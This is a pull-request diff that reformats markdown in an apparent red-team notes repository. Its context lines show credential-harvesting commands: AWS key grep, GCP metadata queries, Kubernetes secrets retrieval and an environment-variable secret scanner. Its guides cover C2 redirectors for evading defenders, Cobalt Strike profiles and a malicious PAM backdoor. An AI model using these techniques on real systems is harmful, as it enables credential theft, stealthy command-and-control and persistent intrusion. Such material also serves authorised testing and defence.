Merge pull request #9 from RoseSecurity/add-pre-commit-hooks

style(docs): improve markdown consistency and formatting

Author: RoseSecurity

.pre-commit-config.yaml

@@ -0,0 +1,13 @@
+repos:
+  - repo: https://github.com/pre-commit/pre-commit-hooks
+    rev: v5.0.0
+    hooks:
+      # Common errors
+      - id: trailing-whitespace # trims trailing whitespace.
+        args: [--markdown-linebreak-ext=md]
+      - id: mixed-line-ending
+
+  - repo: https://github.com/igorshubovych/markdownlint-cli
+    rev: v0.47.0
+    hooks:
+    - id: markdownlint

Cloud.md

@@ -33,7 +33,7 @@ inurl:pastebin "AWS_ACCESS_KEY"
 Recursively searching for AWS Access Keys on *Nix containers
 
 ```bash
-$ grep -ER "AKIA[A-Z0-9]{16}|ASIA[A-Z0-9]{16}" /
+grep -ER "AKIA[A-Z0-9]{16}|ASIA[A-Z0-9]{16}" /
 ```
 
 S3 Log Google Dorking
@@ -311,18 +311,18 @@ main() {
   ip_only_file="ip_addresses.txt"
   : > "$output_file"
   : > "$ip_only_file"
-  
+
   # Get the list of all projects
   projects=$(list_all_projects)
   for project in $projects; do
     echo "Processing Project: $project"
-    
+
     # Check if Resource Manager API is enabled for the project
     if [[ -z "$(is_api_enabled "$project" "cloudresourcemanager.googleapis.com")" ]]; then
       echo "Resource Manager API is not enabled for project $project. Skipping..."
       continue
     fi
-    
+
     # Check if Compute Engine API is enabled for the project
     if [[ -z "$(is_api_enabled "$project" "compute.googleapis.com")" ]]; then
       echo "Compute Engine API is not enabled for project $project. Skipping..."
@@ -342,7 +342,7 @@ main() {
         instance_name=$(_jq '.name')
         zone=$(_jq '.zone' | awk -F/ '{print $NF}')
         public_ips=$(_jq '.networkInterfaces[].accessConfigs[]?.natIP')
-        
+
         # Check if there is a public IP and write to the output files
         if [[ -n "$public_ips" ]]; then
           for ip in $public_ips; do
@@ -402,7 +402,7 @@ curl -s -f -H "Metadata-Flavor: Google" http://metadata/computeMetadata/v1/insta
 # User data
 curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/attributes/startup-script"
 # Network Interfaces
-for iface in $(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/network-interfaces/"); do 
+for iface in $(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/network-interfaces/"); do
     echo "  IP: "$(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/network-interfaces/$iface/ip")
     echo "  Subnetmask: "$(curl -s -f -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/network-interfaces/$iface/subnetmask")
     echo "  Gateway: "$(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/network-interfaces/$iface/gateway")
@@ -411,7 +411,7 @@ for iface in $(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeM
     echo "  ==============  "
 done
 # Service Accounts
-for sa in $(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/service-accounts/"); do 
+for sa in $(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/service-accounts/"); do
     echo "  Name: $sa"
     echo "  Email: "$(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/service-accounts/${sa}email")
     echo "  Aliases: "$(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/service-accounts/${sa}aliases")
@@ -493,7 +493,7 @@ for domain in tqdm(domain_names, desc="Checking for subdomain takeovers"):
 ## Kubernetes Secrets Harvesting
 
 ```bash
-$ curl -k -v -H “Authorization: Bearer <jwt_token>” -H “Content-Type: application/json” https://<master_ip>:6443/api/v1/namespaces/default/secrets | jq -r ‘.items[].data’
+curl -k -v -H “Authorization: Bearer <jwt_token>” -H “Content-Type: application/json” https://<master_ip>:6443/api/v1/namespaces/default/secrets | jq -r ‘.items[].data’
 ```
 
 ## Kubernetes Service Enumeration
@@ -521,34 +521,34 @@ kubectl get pods
 kubectl describe pod <pod-name>
 
 # Create a new pod.
-kubectl create pod <pod-name> 
+kubectl create pod <pod-name>
 
 # List all nodes in the cluster.
-kubectl get nodes 
+kubectl get nodes
 
 # Get detailed information about a node.
-kubectl describe node <node-name> 
+kubectl describe node <node-name>
 
 # Create a new node
-kubectl create node <node-name> 
+kubectl create node <node-name>
 
 # List all services in the cluster.
-kubectl get services 
+kubectl get services
 
 # Get detailed information about a service.
-kubectl describe service <service-name> 
+kubectl describe service <service-name>
 
 # Create a new service.
-kubectl create service <service-name> 
+kubectl create service <service-name>
 
 # List all secrets in the cluster.
-kubectl get secrets 
+kubectl get secrets
 
 # Get detailed information about a secret.
-kubectl describe secret <secret-name> 
+kubectl describe secret <secret-name>
 
 # Create a new secret.
-kubectl create secret <secret-name> 
+kubectl create secret <secret-name>
 ```
 
 ## Password Hunting Regex
@@ -609,24 +609,24 @@ A sample script that enumerates environment variables. This script pairs well wi
 package main
 
 import (
-	"fmt"
-	"os"
-	"strings"
+ "fmt"
+ "os"
+ "strings"
 )
 
 func main() {
-	sensitiveKeywords := []string{"password", "secret", "key", "token", "api", "auth", "credential"}
-
-	envVars := os.Environ()
-	for _, e := range envVars {
-		envLower := strings.ToLower(e)
-		for _, keyword := range sensitiveKeywords {
-			if strings.Contains(envLower, keyword) {
-				fmt.Printf("SENSITIVE: %s\n", e)
-				break
-			}
-		}
-	}
+ sensitiveKeywords := []string{"password", "secret", "key", "token", "api", "auth", "credential"}
+
+ envVars := os.Environ()
+ for _, e := range envVars {
+  envLower := strings.ToLower(e)
+  for _, keyword := range sensitiveKeywords {
+   if strings.Contains(envLower, keyword) {
+    fmt.Printf("SENSITIVE: %s\n", e)
+    break
+   }
+  }
+ }
 }
 ```
 

Guides/AzureStaticWebApplicationC2Redirectors.md

@@ -1,24 +1,24 @@
-# Transforming Azure Static Web Applications into C2 Redirectors:
+# Transforming Azure Static Web Applications into C2 Redirectors
 
-## Creative C2 Redirection:
+## Creative C2 Redirection
 
 This year, I have challenged myself to engineer creative solutions for command-and-control (C2) server redirection. A redirector is a server that sits between your malware controller and the target network. When conducting an engagement, it's crucial to protect offensive infrastructure from detection by defenders. Leveraging cloud features to make  network traffic look legitimate aids in evading intrusion detection systems and can lead to successful completion of offensive operations.
 
 My introduction to developing redirectors started with a basic Apache web server passing HTTP and HTTPS traffic to C2 servers utilizing `mod_rewrite`, a way to conditionally redirect requests to another URL on the fly. However, seeking a stealthier approach, I utilized AWS's Content Delivery Network (CDN) known as CloudFront. By leveraging Amazon's valid certificates and the fact that each domain was allow-listed within the organization, I achieved the desired result: stealth. This began my journey to discovering other methods of masking and redirection to bypass and evade defensive controls.
 
-I was aware that Azure provided similar CDN features, but this approach required a valid domain origin for redirection. What if a down-and-dirty pentester wanted to redirect to a static IP address? That's when I dove into the world of Azure static web applications. 
+I was aware that Azure provided similar CDN features, but this approach required a valid domain origin for redirection. What if a down-and-dirty pentester wanted to redirect to a static IP address? That's when I dove into the world of Azure static web applications.
 
 ---
 
-## Creating Static Web Applications:
+## Creating Static Web Applications
 
 To create a static web application in Azure, simply navigate to the Azure Portal, select _Create a Resource_, search for _Static Web App_, and create!
 
 ![Static Web Application Creation](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/5idppjxu7eyj9e60uoeo.png)
 
 ---
 
-## Building the Static Web Application Code:
+## Building the Static Web Application Code
 
 Before configuring your static web application, you will need to create a GitHub repository to host the code. I simply named mine _StaticWebRedirector_ and created two files in the repository. The first is the HTML index file that will be referenced if the target is not redirected. To safeguard offensive infrastructure from effective defenders and web crawlers, it is crucial to establish criteria for redirection. This can involve specifying a particular URL that the targeted device is attempting to access or defining a specific User-Agent string as conditions for the redirection process. Within your `index.html` file, create a legitimate-looking site to not raise suspicion if the website is crawled or accessed by network defenders. Secondly, create a separate file named `staticwebapp.config.json` and add the following code to it.  
 
@@ -28,16 +28,15 @@ The `staticwebapp.config.json` configuration file defines a _route_, which is th
 
 ---
 
-## Configuring the Web Application:
+## Configuring the Web Application
 
 To configure the Azure static web application, you need to provide details like the subscription, resource group, name, region, and source code repository. You will also be required to authenticate to the GitHub account of the repository where the code is hosted. In addition, you have the option to configure the build settings, such as using build presets or specifying a custom build command if required. I did not utilize any of these features, but they are available. Finally, you can click on "Review + Create" to review all the provided settings and then click "Create" to initiate the creation of the static web app redirector.
 
-
 ![Configuring Static Web App](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/1t04d7r7hd97zwld2gyf.png)
 
 ---
 
-## Customizing the C2 Profile:
+## Customizing the C2 Profile
 
 To effectively utilize this technique, your malware, implants, and payloads need to call back to the web application's URL. For example, if you are using Cobalt Strike, copy the `azurestaticapp` URL into your malleable profile. The URL can be found on the redirector's _Overview_ tab.
 
@@ -66,8 +65,8 @@ http-get {
     }
 ```
 
-Compile your payloads and launch away! 
+Compile your payloads and launch away!
 
 ---
 
-I hope this simple demonstration was useful and you learned something new. There are many creative ways to evade defensive controls, and if you would like to learn more, feel free to check out my GitHub at: https://github.com/RoseSecurity
+I hope this simple demonstration was useful and you learned something new. There are many creative ways to evade defensive controls, and if you would like to learn more, feel free to check out my GitHub at: <https://github.com/RoseSecurity>

Guides/CloudFrontingThroughFirewallsandHidinginPlainPCAP.md

@@ -1,11 +1,10 @@
 # Creative C2 Obfuscation - CloudFronting Through Firewalls and Hiding in Plain PCAP
 
-## What is CloudFronting:
+## What is CloudFronting
 
+AWS CloudFront enhances obfuscation of Command and Control (C2) Infrastructure by seamlessly integrating beacon callbacks into Content Delivery Network (CDN) traffic. A CDN functions as a network of strategically distributed proxy servers across various locations, ensuring optimal performance and availability while delivering data to clients. Consequently, CloudFronting poses a significant challenge for defensive security analysts, as it evades suspicion and defies blacklisting efforts. Notably, CloudFront, the integrated CDN offered by AWS, stands out as an ideal choice due to its scalability, advanced features, and the convenience it offers red teamers by minimizing the need to leave the AWS Console for infrastructure configuration changes.
 
-AWS CloudFront enhances obfuscation of Command and Control (C2) Infrastructure by seamlessly integrating beacon callbacks into Content Delivery Network (CDN) traffic. A CDN functions as a network of strategically distributed proxy servers across various locations, ensuring optimal performance and availability while delivering data to clients. Consequently, CloudFronting poses a significant challenge for defensive security analysts, as it evades suspicion and defies blacklisting efforts. Notably, CloudFront, the integrated CDN offered by AWS, stands out as an ideal choice due to its scalability, advanced features, and the convenience it offers red teamers by minimizing the need to leave the AWS Console for infrastructure configuration changes. 
-
-## Setup and Configuration:
+## Setup and Configuration
 
 ![Create Distro](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/llp52x56cmlsc4jgrvgy.jpg)
 
@@ -27,11 +26,10 @@ After selecting the appropriate settings for the domain, create the distribution
 
 ![Distro](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/bm4c9jg763dbelolfgg9.jpg)
 
-## C2 Profile:
+## C2 Profile
 
 To effectively utilize this technique, your malware, implants, and payloads need to call back to the CloudFront domain. For example, if you are using Cobalt Strike, copy the distribution domain into your malleable profile; you can add this in the `host` header. Below is an example from threatexpress' jquery-c2.4.7 profile:
 
-
 ```
 http-post {
 
@@ -44,13 +42,13 @@ http-post {
         header "Host" "dgwduytwaq0ei.cloudfront.net";
         header "Referer" "http://code.jquery.com/";
         header "Accept-Encoding" "gzip, deflate";
-       
+
         id {
-            mask;       
+            mask;  
             base64url;
-            parameter "__cfduid";            
+            parameter "__cfduid";  
         }
-              
+
         output {
             mask;
             base64url;
@@ -59,7 +57,7 @@ http-post {
     }
 ```
 
-## Automating Deployments with Terraform:
+## Automating Deployments with Terraform
 
 Terraform is an open-source infrastructure as code (IaC) tool that enables users to define and provision infrastructure resources in a declarative manner. It allows organizations to automate the creation, management, and versioning of their infrastructure using a simple and consistent workflow. Terraform allows red teams to define and provision the necessary infrastructure resources on demand, ensuring consistency and repeatability. By leveraging Terraform, red teams can easily spin up and tear down environments, deploy and configure systems, and simulate attack scenarios in a controlled manner. This helps red teams streamline their operations, save time, and maintain a standardized approach to infrastructure deployment during red teaming exercises.
 
@@ -109,7 +107,7 @@ resource "aws_cloudfront_distribution" "redirector-cf" {
     restrictions {
       geo_restriction {
         restriction_type = "none"
-	locations = []
+ locations = []
       }
     }
 
@@ -131,4 +129,4 @@ terraform init
 terraform apply
 ```
 
-I hope this simple demonstration was useful and you learned something new. There are many creative ways to evade defensive controls, and if you would like to learn more, feel free to check out my GitHub at: https://github.com/RoseSecurity
+I hope this simple demonstration was useful and you learned something new. There are many creative ways to evade defensive controls, and if you would like to learn more, feel free to check out my GitHub at: <https://github.com/RoseSecurity>

Guides/CraftingMaliciousPluggableAuthenticationModules.md

@@ -122,7 +122,7 @@ ld -x --shared -o /usr/lib/x86_64-linux-gnu/security/pam_su.so  pam_su.o
 Now that the binary is created and linked, we will edit the PAM configuration file `/etc/pam.d/common-auth` to include our malicious module. This specific file is used to define authentication-related PAM modules and settings that are common across multiple services, whether this be SSH, LDAP, or even VNC. Instead of duplicating authentication configurations in each individual service file, administrators centralize common authentication settings in this file.
 
 ```console
-root@salsa:~# vim /etc/pam.d/common-auth 
+root@salsa:~# vim /etc/pam.d/common-auth
 
 #
 # /etc/pam.d/common-auth - authentication settings common to all services
@@ -158,7 +158,7 @@ Within this file, we can inconspicuously add our optional authentication module
 
 ```console
 ➜  ~ ssh sysadmin@10.0.0.104
-sysadmin@10.0.0.104's password: 
+sysadmin@10.0.0.104's password:
 Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 6.2.0-37-generic x86_64)
 
  * Documentation:  https://help.ubuntu.com

Guides/Enum_AzureSubdomains/README.md

@@ -6,7 +6,7 @@
 
 Microsoft makes use of a number of different domains and subdomains for each of their Azure services. From SQL databases to SharePoint drives, each service maps to its respective domain/subdomain, and with the proper toolset, these can be identified through DNS enumeration to yield information about the target domain's infrastructure. ```enum_azuresubdomains.rb``` is a Metasploit module for enumerating public Azure services by validating legitimate subdomains through various DNS record queries. This cloud reconnaissance module rapidly identifies API services, storage accounts, key vaults, databases, and more! Expedite your cloud reconnaissance phases with ```enum_azuresubdomains.rb```.
 
-## Domains and Associated Services:
+## Domains and Associated Services
 
 | Domain | Associated Service |
 | --- | --- |
@@ -31,18 +31,18 @@ Microsoft makes use of a number of different domains and subdomains for each of
 
 ***NOTE: Enumerating existing Azure subdomains may be handy for anyone looking to conduct subdomain takeovers. Subdomain takeovers are typically done the other way around (finding a domain that’s no longer registered or in use), but by preemptively discovering the domains, and keeping tabs on them for later, you may be able to monitor for potential subdomain takeovers.***
 
-# Demo:
+# Demo
 
-https://github.com/user-attachments/assets/ffe508b6-a146-454d-b453-96b9d59b7e27
+<https://github.com/user-attachments/assets/ffe508b6-a146-454d-b453-96b9d59b7e27>
 
-# Install:
+# Install
 
 Download repository:
 
 ```
-$ mkdir Enum_AzureSubdomains
-$ cd Enum_AzureSubdomains/
-$ sudo git clone https://github.com/RoseSecurity/Enum_AzureSubdomains.git
+mkdir Enum_AzureSubdomains
+cd Enum_AzureSubdomains/
+sudo git clone https://github.com/RoseSecurity/Enum_AzureSubdomains.git
 ```
 
 Usage:
@@ -68,6 +68,5 @@ msf6> use auxiliary/gather/enum_azuresubdomains
 If you encounter any errors, check the following log:
 
 ```
-$ tail ~/.msf4/logs/framework.log
+tail ~/.msf4/logs/framework.log
 ```
-

Guides/Enum_AzureSubdomains/msf.md

@@ -1,12 +1,13 @@
 ## Introduction
+
 Microsoft makes use of a number of different domains and subdomains for each of their Azure services. From SQL databases to SharePoint drives, each service maps to its respective domain/subdomain, and these can be identified through DNS enumeration to yield information about the target domain's infrastructure. ```enum_azuresubdomains.rb``` is a Metasploit module for enumerating public Azure services by validating legitimate subdomains through various DNS record queries. This cloud reconnaissance module identifies API services, storage accounts, key vaults, and databases.
 
 ## Verification Steps
 
   1. Start `msfconsole`
   2. Do: `use auxiliary/gather/enum_azuresubdomains`
   3. Do: `set DOMAIN <Target Domain>`
-  5. Do: `run`
+  4. Do: `run`
 
 ## Options
 
@@ -18,7 +19,6 @@ Microsoft makes use of a number of different domains and subdomains for each of
 
   This appends and prepends permutated keywords to identify common domain name variations.
 
-
 ## Scenarios
 
 Running the module against a real system (in this case, the University of Maryland's online Azure services):